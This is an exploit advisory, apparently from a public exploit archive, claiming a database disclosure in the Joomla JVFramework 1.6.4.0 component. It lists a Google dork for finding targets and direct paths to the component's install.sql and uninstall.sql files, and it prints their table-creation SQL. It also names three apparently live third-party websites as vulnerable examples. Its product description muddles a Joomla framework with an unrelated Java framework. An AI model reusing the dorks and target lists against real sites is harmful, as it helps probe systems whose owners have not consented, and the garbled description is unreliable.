Joomla JVFramework 1.6.4.0 Database Disclosure

`####################################################################  
  
# Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 19/01/2019  
# Vendor Homepages : joomlavi.com ~ jvframework.com  
# Software Download Link :  
bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/  
# Software Information Link : sourceforge.net/projects/jvframework/  
# Software Affected Version : 1.6.4.0  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/administrator/components/com_jvframework/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
####################################################################  
  
# Description :  
**************  
*JV Framework brings you the power to handle your website in the most  
elegant way.  
*JV Framework has got the first-time deployed Drag and Drop feature.  
*JVFramework is an application framework for Java. It's main goal is to  
avoid code duplication  
(such as metatada, UI programming, etc) related to the construction of a  
web application, providing a declarative language for business tier  
programming.  
  
####################################################################  
  
# Database Disclosure Exploit :  
***************************  
  
/administrator/components/com_jvframework/installation/install.sql  
/administrator/components/com_jvframework/installation/uninstall.sql  
  
####################################################################  
  
# Information : [ uninstall.sql ] =>  
************  
-- --------------------------------------------------------  
DROP TABLE IF EXISTS `#__jv_themes`;  
-- --------------------------------------------------------  
DROP TABLE IF EXISTS `#__jv_theme_assign`;  
  
*******************************************  
  
# Information : [ install.sql ] =>  
  
-- -------------------------------------------------------------  
  
CREATE TABLE IF NOT EXISTS `#__jv_themes` (  
`id` int(11) NOT NULL AUTO_INCREMENT,  
`theme` varchar(50) NOT NULL,  
`home` tinyint(1) NOT NULL,  
`params` varchar(10240) NOT NULL,  
`published` tinyint(1) NOT NULL DEFAULT '0',  
PRIMARY KEY (`id`)  
) ENGINE=MyISAM DEFAULT CHARSET=utf8;  
  
-- -------------------------------------------------------------  
  
CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (  
`id` int(11) NOT NULL AUTO_INCREMENT,  
`menuid` int(11) NOT NULL,  
`themeid` int(11) NOT NULL,  
PRIMARY KEY (`id`)  
) ENGINE=MyISAM DEFAULT CHARSET=utf8;  
  
####################################################################  
  
# Example Vulnerable Sites :  
*************************  
  
[+]  
legacyshare.org/administrator/components/com_jvframework/installation/install.sql  
  
[+]  
mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql  
  
[+]  
lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
####################################################################  
`